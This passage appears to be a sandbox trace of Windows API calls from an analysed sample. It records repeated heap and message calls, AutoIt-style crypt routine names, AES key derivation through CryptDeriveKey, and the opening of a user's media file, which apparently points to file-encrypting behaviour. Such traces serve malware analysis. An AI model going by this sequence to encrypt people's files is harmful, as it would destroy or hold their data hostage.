dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.195] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.195] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.195] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x632e5550, ftLastWriteTime.dwHighDateTime=0x1d5e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 0x90ae18 [0198.195] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.195] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.195] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.195] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.195] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.196] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.196] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.196] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.196] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0198.196] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.196] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.197] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0198.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.197] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0198.197] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.198] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0198.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0198.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.198] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.199] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.199] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.199] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.199] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.199] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.199] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.199] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.199] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.199] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.199] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.199] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.199] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.199] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.200] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.200] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.200] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.200] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.200] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.200] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.201] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0198.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.201] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.201] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0198.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0198.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.202] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0198.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.202] CryptDestroyHash (hHash=0x90af58) returned 1 [0198.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.202] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.202] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.202] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0198.202] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\d8qdzfy_.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.203] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.203] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0198.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 